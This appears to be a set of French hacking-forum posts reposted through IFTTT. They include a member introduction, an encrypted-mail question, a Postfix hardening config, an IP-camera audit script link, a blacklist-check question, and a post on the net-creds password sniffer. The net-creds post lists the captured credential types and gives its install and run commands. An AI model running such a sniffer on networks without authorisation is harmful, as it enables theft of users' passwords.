Connaissances informatiques générales : Hardware,Langages(HTML,PHP,SQL),CISCO CCNA 1 et 2 (3 et 4 en cours)et autres compétences en Réseau.
Connaissances en hacking :Exploitation de réseau, Injection SQL, Phishing et utilisation de logiciels.
Système d'exploitation principal :Windows 8, Kali Linux, Debian
Je viens sur ce forum pour :Approfondir mes connaissances et apporter de l'aide aux autres membres.
J'ai connu ce forum via : Moteur de recherche
Informations supplémentaires (job, intérêts, autres...) : Travail dans l'informatique, étudie le réseau et des notions de sécurité pour entreprises et réseaux sans fil.

J’espère passer un bon moment sur ce forum en votre compagnie.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Dvo2TX
via IFTTT

adresse mail crypté sécurisé

Quel est la messagerie crypté qui est vraiment anti-nsa?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1bdaaHj
via IFTTT

Configuration pour un serveur postfix sécurisé ?

Bonjour,

Voilà, j'administre un vps de chez OVH et dans ce cadre, j'ai reçu un mail me disant que mon serveur est utilisé pour des activités de spamming.

Du coup, j'ai voulu améliorer la sécurité de mon serveur postfix, histoire de corriger le bousin.

Je suis arrivé à la config écrite ci-dessous. Pouvez vous me dire si elle vous parait correcte ?

Merci beaucoup.

Code:

# See /usr/share/postfix/main.cf.dist for a commented, more complete version


# Debian specific:  Specifying a file name will cause the first
# line of that file to be used as the name.  The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname

smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
biff = no

# appending .domain is the MUA's job.
append_dot_mydomain = no

# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h

readme_directory = no

# TLS parameters
smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key
smtpd_use_tls=yes
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache

# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
# information on enabling SSL in the smtp client.

myhostname = smtp.mydomain.be
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = vpsXXXX.ovh.net, localhost.ovh.net, , localhost, mydomain.be
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_protocols = all
home_mailbox = Maildir/

default_process_limit = 100
smtpd_client_connection_count_limit = 10
smtpd_client_connection_rate_limit = 30
queue_minfree = 20971520
header_size_limit = 51200
message_size_limit = 10485760
smtpd_recipient_limit = 100
smtpd_sasl_auth_enable = yes
smtpd_tls_auth_only = yes
smtpd_recipient_restrictions = permit_mynetworks reject_unauth_destination
smtp_sasl_auth_enable = yes
smtpd_client_restrictions = permit_mynetworks, reject



from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1cPivCa
via IFTTT

[script] Audit de caméra IP avec ipCamShell

IP CAM SHELL

Script PHP permettant de tester la sécurité d'un réseau de camera IP ( pas pour matter la poitrine de la voisine :p )

Git : http://ift.tt/1DqsB4T


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1bda9mE
via IFTTT

[SCRIPT] Net-creds MacOS password sniffer

[SCRIPT] Net-creds Sniffeur de Logins/MDP

URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
Kerberos

Git: http://ift.tt/1yyJTOb
Homebrew est nécéssaire pour les dépendances sur OS X
Remplacer a la ligne 74 '/sbin/ip' par '/usr/local/bin/ip'.

Installation OS X
Code:

brew install python
pip install scapy
pip install wsgiref
pip install pcapy
pip install pypcap
brew install libdnet --with-python
brew tap brona/iproute2mac
brew install iproute2mac

Auto-detection de l'interface

Code:

sudo python net-creds.py
Sniff sur interface eth0

Code:

sudo python net-creds.py -i eth0
Ignore ip 192.168.0.2

Code:

sudo python net-creds.py -f 192.168.0.2
Lecture du fichier pcap

Code:

python net-creds.py -p pcapfile


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1cPiyh9
via IFTTT

Script pour vérifier si un site est blacklisté ?

Salut,

En ce moment j'ai pas mal de soucis, chez un client, avec l'envoie de mail, exchange / blacklist \o/

Du coup je traine pas mal sur les sites du genre mxtoolbox / spamhaus etc...

Ma question: Est il possible de faire un script "maison" qui check les enregistrements mx / a, test la résolution, test le spf, etc etc etc... comme justement le fait le site mxtoolbox et vérifie les listes de domaine considérés comme spameurs ?

Merci d'avance.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1D5r6qm
via IFTTT